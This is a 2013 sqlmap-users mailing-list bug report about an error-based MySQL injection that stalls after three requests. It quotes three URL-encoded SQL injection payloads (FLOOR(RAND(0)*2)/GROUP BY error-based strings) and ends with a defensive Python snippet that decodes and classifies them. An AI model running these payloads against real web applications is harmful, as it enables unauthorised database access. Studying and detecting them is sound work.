[sqlmap-users] MySQL error based technique bug
From: Konrads S. <ko...@sm...> - 2013-04-18 20:37:16
A php/mysql system has a simple, integer SQL injection. The only working technique is error based (verified and successfully exploited manually). Any other techniques cause the server to not reply, just stall. When using sqlmap with --dbms=mysql and --technique=E, sqlmap successfully does 3 requests, but does something different on the fourth which causes the server to time out and never reply.

The successful requests are:

* id=1%22%27%29%5B.%27%29%28%5D%5B
* id=1%29%20AND%20%28SELECT%201561%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a70736c3a%2C%28SELECT%20%28CASE%20WHEN%20%281561%3D1561%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7a6d683a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%286864%3D6864
* id=1%20AND%20%28SELECT%201561%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a70736c3a%2C%28SELECT%20%28CASE%20WHEN%20%281561%3D1561%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7a6d683a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29

The fourth request, which I sadly don't have saved, fails. Casual glance suggested it was different from these and was not error based (I might be wrong).

--
Konrads Smelkovs
Applied IT sorcery.
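For anyone reading these requests from the server side, the following added example (not part of the original post and not sqlmap code) URL-decodes an `id` value, recognises the error-based shape of the quoted requests, and decodes the `0x...` literals inside them. The function name `classify`, the regular expressions and the benign sample value are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# 0x... hex string literals, which MySQL evaluates to text
HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2})+)")
# Shape shared by the second and third requests quoted in the post
ERROR_BASED = re.compile(
    r"count\(\*\).*concat\(.*floor\(rand\(0\)\*2\).*group\s+by", re.I | re.S)
# Run of quote/bracket characters, as in the first request
SYNTAX_PROBE = re.compile(r"""['"()\[\]]{4,}""")


def classify(raw_value):
    """Return (verdict, markers) for one raw, URL-encoded parameter value."""
    sql = unquote(raw_value)
    if ERROR_BASED.search(sql):
        # Decode the hex literals to the text that CONCAT puts around the result
        markers = [bytes.fromhex(h).decode("latin-1")
                   for h in HEX_LITERAL.findall(sql)]
        return "error-based", markers
    if SYNTAX_PROBE.search(sql):
        return "syntax-probe", []
    return "clean", []


# First and third 'id' values as quoted in the post, plus one constructed
# benign value for contrast.
SAMPLES = [
    "1%22%27%29%5B.%27%29%28%5D%5B",
    "1%20AND%20%28SELECT%201561%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a70736c3a%2C%28SELECT%20%28CASE%20WHEN%20%281561%3D1561%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7a6d683a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29",
    "42",
]

if __name__ == "__main__":
    for value in SAMPLES:
        verdict, markers = classify(value)
        print(f"{verdict:13} markers={markers} value={unquote(value)[:60]}")
```

The decoded literals (`:psl:` and `:zmh:`) are the strings the `CONCAT` places around the `CASE` result, so they are also worth searching for in logged response bodies.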